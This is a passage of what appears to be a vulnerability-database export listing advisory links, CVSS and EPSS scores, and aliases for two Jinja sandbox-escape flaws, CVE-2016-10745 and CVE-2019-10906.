scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4011-1
18
reference_url https://usn.ubuntu.com/4011-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4011-1/
19
reference_url https://usn.ubuntu.com/4011-2
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4011-2
20
reference_url https://usn.ubuntu.com/4011-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4011-2/
21
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1698345
reference_id 1698345
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1698345
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
23
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10745
reference_id CVE-2016-10745
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 8.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
2
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
3
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
4
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10745
fixed_packages
aliases CVE-2016-10745, GHSA-hj2j-77xm-mc5v, PYSEC-2019-220
risk_score 4.0
exploitability 0.5
weighted_severity 8.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6fxc-s6ht-x7ht
15
url VCID-6wxf-ewtr-z3hb
vulnerability_id VCID-6wxf-ewtr-z3hb
summary In Pallets Jinja before 2.10.1, str.format_map allows a sandbox escape.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html
2
reference_url https://access.redhat.com/errata/RHSA-2019:1152
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1152
3
reference_url https://access.redhat.com/errata/RHSA-2019:1237
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1237
4
reference_url https://access.redhat.com/errata/RHSA-2019:1329
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1329
5
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10906.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10906.json
6
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-10906
reference_id
reference_type
scores
0
value 0.03483
scoring_system epss
scoring_elements 0.87518
published_at 2026-04-01T12:55:00Z
1
value 0.03483
scoring_system epss
scoring_elements 0.87573
published_at 2026-04-13T12:55:00Z
2
value 0.03483
scoring_system epss
scoring_elements 0.87577
published_at 2026-04-12T12:55:00Z
3
value 0.03483
scoring_system epss
scoring_elements 0.87581
published_at 2026-04-11T12:55:00Z
4
value 0.03483
scoring_system epss
scoring_elements 0.8757
published_at 2026-04-09T12:55:00Z
5
value 0.03483
scoring_system epss
scoring_elements 0.87563
published_at 2026-04-08T12:55:00Z
6
value 0.03483
scoring_system epss
scoring_elements 0.87544
published_at 2026-04-07T12:55:00Z
7
value 0.03483
scoring_system epss
scoring_elements 0.87542
published_at 2026-04-04T12:55:00Z
8
value 0.03483
scoring_system epss
scoring_elements 0.87528
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-10906
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10906
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10906
8
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
9
reference_url https://github.com/advisories/GHSA-462w-v97r-4m45
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-462w-v97r-4m45
10
reference_url https://github.com/pallets/jinja
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/jinja
11
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-217.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-217.yaml
12
reference_url https://lists.apache.org/thread.html/09fc842ff444cd43d9d4c510756fec625ef8eb1175f14fd21de2605f@%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/09fc842ff444cd43d9d4c510756fec625ef8eb1175f14fd21de2605f@%3Cdevnull.infra.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/09fc842ff444cd43d9d4c510756fec625ef8eb1175f14fd21de2605f%40%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/09fc842ff444cd43d9d4c510756fec625ef8eb1175f14fd21de2605f%40%3Cdevnull.infra.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/2b52b9c8b9d6366a4f1b407a8bde6af28d9fc73fdb3b37695fd0d9ac@%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/2b52b9c8b9d6366a4f1b407a8bde6af28d9fc73fdb3b37695fd0d9ac@%3Cdevnull.infra.apache.org%3E
15
reference_url https://lists.apache.org/thread.html/2b52b9c8b9d6366a4f1b407a8bde6af28d9fc73fdb3b37695fd0d9ac%40%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/2b52b9c8b9d6366a4f1b407a8bde6af28d9fc73fdb3b37695fd0d9ac%40%3Cdevnull.infra.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/320441dccbd9a545320f5f07306d711d4bbd31ba43dc9eebcfc602df@%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/320441dccbd9a545320f5f07306d711d4bbd31ba43dc9eebcfc602df@%3Cdevnull.infra.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/320441dccbd9a545320f5f07306d711d4bbd31ba43dc9eebcfc602df%40%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/320441dccbd9a545320f5f07306d711d4bbd31ba43dc9eebcfc602df%40%3Cdevnull.infra.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/46c055e173b52d599c648a98199972dbd6a89d2b4c4647b0500f2284@%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/46c055e173b52d599c648a98199972dbd6a89d2b4c4647b0500f2284@%3Cdevnull.infra.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/46c055e173b52d599c648a98199972dbd6a89d2b4c4647b0500f2284%40%3Cdevnull.infra.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/46c055e173b52d599c648a98199972dbd6a89d2b4c4647b0500f2284%40%3Cdevnull.infra.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/57673a78c4d5c870d3f21465c7e2946b9f8285c7c57e54c2ae552f02@%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/57673a78c4d5c870d3f21465c7e2946b9f8285c7c57e54c2ae552f02@%3Ccommits.airflow.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/57673a78c4d5c870d3f21465c7e2946b9f8285c7c57e54c2ae552f02%40%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/57673a78c4d5c870d3f21465c7e2946b9f8285c7c57e54c2ae552f02%40%3Ccommits.airflow.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/7f39f01392d320dfb48e4901db68daeece62fd60ef20955966739993@%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/7f39f01392d320dfb48e4901db68daeece62fd60ef20955966739993@%3Ccommits.airflow.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/7f39f01392d320dfb48e4901db68daeece62fd60ef20955966739993%40%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/7f39f01392d320dfb48e4901db68daeece62fd60ef20955966739993%40%3Ccommits.airflow.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/b2380d147b508bbcb90d2cad443c159e63e12555966ab4f320ee22da@%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/b2380d147b508bbcb90d2cad443c159e63e12555966ab4f320ee22da@%3Ccommits.airflow.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/b2380d147b508bbcb90d2cad443c159e63e12555966ab4f320ee22da%40%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/b2380d147b508bbcb90d2cad443c159e63e12555966ab4f320ee22da%40%3Ccommits.airflow.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/f0c4a03418bcfe70c539c5dbaf99c04c98da13bfa1d3266f08564316@%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/f0c4a03418bcfe70c539c5dbaf99c04c98da13bfa1d3266f08564316@%3Ccommits.airflow.apache.org%3E
27
reference_url https://lists.apache.org/thread.html/f0c4a03418bcfe70c539c5dbaf99c04c98da13bfa1d3266f08564316%40%3Ccommits.airflow.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/f0c4a03418bcfe70c539c5dbaf99c04c98da13bfa1d3266f08564316%40%3Ccommits.airflow.apache.org%3E
28
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF/
29
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU/
30
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ/
31
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF
32
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF/
33
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU
34
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU/
35
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ
36
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ/
37
reference_url https://palletsprojects.com/blog/jinja-2-10-1-released
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://palletsprojects.com/blog/jinja-2-10-1-released
38
reference_url https://usn.ubuntu.com/4011-1
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4011-1
39
reference_url https://usn.ubuntu.com/4011-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4011-1/
40
reference_url https://usn.ubuntu.com/4011-2
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4011-2
41
reference_url https://usn.ubuntu.com/4011-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4011-2/
42
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1698839
reference_id 1698839
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1698839
43
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=926602
reference_id 926602
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=926602
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:jinja:*:*:*:*:*:*:*:*
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:software_collections:1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:software_collections:1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:software_collections:1.0:*:*:*:*:*:*:*
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
48
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
49
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
50
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*
51
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*
52
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*
53
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*
54
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
55
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
56
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*
reference_id cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*
57
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-10906
reference_id CVE-2019-10906
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
2
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
3
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
4
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-10906
fixed_packages
aliases CVE-2019-10906, GHSA-462w-v97r-4m45, PYSEC-2019-217
risk_score 4.0
exploitability 0.5
weighted_severity 8.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6wxf-ewtr-z3hb
16
